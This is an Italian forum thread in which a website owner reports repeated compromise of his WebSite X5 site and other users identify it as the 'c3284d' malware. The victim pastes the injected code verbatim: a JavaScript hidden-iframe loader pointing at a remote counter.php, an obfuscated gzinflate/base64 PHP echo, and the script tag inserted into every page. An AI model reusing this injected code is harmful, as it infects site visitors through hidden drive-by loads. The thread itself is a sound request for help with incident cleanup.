Pagina imlogin.php modificata con malware 
Autore: Marco B.Buon giorno,
da qualche giorno riscontro problemi con le pagine protette del mio sito.
Quando acceddo alle pagine protette, alla richiesta di log-in la pagina appare tutta scombussolata, lo sfondo è rimpicciolito e il log-in appare in basso in fondo alla pagina tutto spostato a sinistra. Insomma viene completamente persa l'impaginazione.
Per ripristinare il tutto come prima devo ripristinare il file "imlogin.php" da un backup precedente. Il tutto avviene dopo aver fatto l'ultimo aggiornamento al programma Incomedia WebSite X5 Evo 9, non so se possa centrare ma lo segnalo.
Inoltre nel sito mi trovo spesso, quando ho il problema sopraelencato, un file nuovo javascript che non ho assolutamente creato io e che kaspersky rileva come malevolo.
Il sito è depositato su altervista.org, loro non rilevano problemi, così ho pensato di scrivere a voi, non vorrei ci fosse un bug nella gestione delle pagine di log-in.
Oltre a questi problemi mi sono trovato modificato anche il file httaccess della mia pagina web con reindirizzamento a pagine malevoli.
Le password sono state tutte cambiate me il problema persiste.
Unico programma esterno che ho sul sito è "cutenews" un cms senza uso di database per poter scrivere le news nella pagina web dedicata agli avvisi direttamente da interfaccia web.
La pagina Avvisi però è protetta.
Modifiche alle pagine del sito stesso non ho mai rilevate.
Come posso fare per controllare da dove dipenda il problema?
Ho provato anche a cancellare tutto sullo spazio web e ricaricare completamente il sito, ma nel giro di qualche giorno ritornano i problemi.
Non so più come fare.
Fino a prima di aggiornare il vostro programma non ho mai riscontrato problemi, ma potrebbe essere un puro caso.
Se ti riferisci a questovvfcesenatico.altervista.org/imlogin.php non vedo "cose strane", a parte il testo poco leggibile (colpa del colore scelto).
Provato a svuotare cache, file temporanei etc...?
_______ oltre il 5° step ________
http://www.unofficialwsx5.com
__ questa sera: FRITTO MISTO! __
Autore
Salve,
avevo sistemato il sito proprio questa mattina, ma ora sono andato a controllare ed è ritornato il problema.
Questa volta non lo correggo in modo lo possiate vedere anche voi.
Ho notato che il problema colpisce solo i browser internet explorer.
Ho provato con vari pc e il problema persiste, anche diversi utenti mi hanno segnalato questo problema quindi nescluderei possa centrare il mio browser anche se comunque avevo già provato a svuotare cache, cronologia temporanei ecc...
Dentro alla cartella "RES" che viene creata da Incomedia WebSite ho notato che viene aggiunto un file "jquery.ui.dialog.min.js " che non ho creato io.
Adesso li salvo e ve li allego in modo da poter essere analizzati.
Autore
Allora, dentro alla cartella "RES" viene creato questo file di nome "jquery.ui.dialog.min.js" che contiene il seguente codice al suo interno:
/*c3284d*/ var _q = document.createElement('iframe'),_n = 'setAttribute';_q[_n]
('src', 'http://mytresca.com/counter.php');_q.style.position =
'absolute';_q.style.width = '16px';_q[_n]('frameborder',
navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') +
1);_q.style.left = '-6200px';[removed]('<div id=\'pzadv
\'></div>');document.getElementById('pzadv').appendChild(_q); /*/c3284d*/
Inoltre viene modificato anche il file "imlogin.php" introducendo al suo interno queste righe di codice:
#c3284d# echo(gzinflate(base64_decode("TcxBDgIhDEDRqxAO0O7NzNylwYolCNgW4txek9m4fT/5myWV4cHPwXt0/jgWWnRpDJVanpR/6V9N0x6f7uOGuNYjsXEjl9SBqrMuMSfompUNy3uynjAF7kK1Z3hJg2IxHBtev+ML"))); #/c3284d#
Come ripararmi da questa sorta di attacco/bug?
Grazie a tutti per l'attenzione.
Adesso vedo il problema su IE e lo crea quello script inserito prima del tag !DOCTYPE.
Ho visto che hai scritto pure sul forum di Altervista e, se qui non troverai soluzione, mi concentrerei sulle indicazioni ricevute.
Adesso il "redirect" non mi sembra di vederlo forse perché lo script è inserito male, nel senso che manca una barra (/) nel percorso tra .org e res... anche i cattivi sbagliano? Mah...
_______ oltre il 5° step ________
http://www.unofficialwsx5.com
__ questa sera: FRITTO MISTO! __
Mi riferivo a questo:
_______ oltre il 5° step ________
http://www.unofficialwsx5.com
__ questa sera: FRITTO MISTO! __
Autore
Si ho scitto anche su altervista, le loro indicazioni le ho già seguite.
Il redirect non c'è più anche perchè il file httaccess è già stato ripulito e non è più stato modificato.
Ho anche provveduto ad aggiornare all'ultima versione il CMS cutenews.
Adesso provo a disinstallarlo e vedere se il problema persiste per vedere se dipende dal CMS che anche se aggiornato magari non hanno risolto il bug.
La cosa strana è che da 6-7mesi che il sito è on-line il problema è venuto fuori in questi giorni dopo l'ultimo aggiornamento di Incomedia. Pura coincidenza?
Solo il tempo, credo, potrà risponderti
_______ oltre il 5° step ________
http://www.unofficialwsx5.com
__ questa sera: PORCHETTA! __
Autore
allora, ho provveduto a rimuovere il CMS "cutenews", riparato il problema ma oggi si è ripresentato ancora a questo punto penso di avere la conferma che il bug si trova nel codice di Incomedia.
Le password tutte cambiate, il CMS eliminato, non so più cosa tentare, ho riuppato il sito da zero ma nulla è cambiato.
E la cosa inizia ad essere seccante non poter visualizzare correttamente la pagina di log-in.
se si trattasse di un bug ne saremmo tutti sogetti.
in realtà vedo che non è solo la pag di login ad esere interessata ma anche le altre, la home non mi pare.
In tutter le pagine che ho guardato è presente questa stringa
<!--c3284d--><script type="text/javascript" language="javascript" src="http://vvfcesenatico.altervista.orgres/jquery.ui.dialog.min.js" ></script><!--/c3284d-->
all'inizio e alla fine è scritto c3284d e cercando con google risulterebbe essere un malware
https://www.google.it/search?sugexp=chrome,mod=15&sourceid=chrome&ie=UTF-8&q=c3284d
Non sarà mica causato da qualche contatore/script di dubbia provenienza da te utilizzato sul sito?
Di sicuro hai un replicatore <c3284d> nel tuo sistema e si replica in automatico quando carichi sul server....pulisci prima il tuo sistema e riprova a fare il tutto.
qui ho trovato qualcosa:
http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html
leggi cosa dice in proposito
Un BUG è un errore di programmazione o comunque un difetto che causa un comportamento imprevisto su determinate situazioni, un difetto la cui manifestazione è perfettamente ottenibile ricreando le situazioni specifiche.
E questo non è decisamente il tuo caso. Ci sarebbero decine di segnalazioni analoghe e comunque non ci sono i presupposti per la mancanza di un comportamento riconducibile ad un difetto di programmazione.
Come suggerito da Carmelo, si tratta di un problema del tuo pc oppure di un exploit sul tuo webserver oppure di qualcosa che hai erroneamente inserito nel sito web. Ma di BUG su website non se ne sente nemmeno l'odore ... in questo caso ... semmai non c'e dubbio alcuno sul BUG di proFTPD ... ma se questa fosse la causa, ne sarebbero affetti centinaia o migliaia di siti web insieme al tuo.
Autore
Allora, adesso provvederò a pulire tutte le pagine una per una, il pc risulta pulitò lo passato al setaccio con Kaspersky Pure che è il mio antivirus e non mi rileva nulla di strano.
Unico contatore sul sito è quello di shinystat, altra roba era il cms CuteNews che però ho tolto.
Vediamo cosa succede.
Per ora ringrazio tutti per i suggerimenti.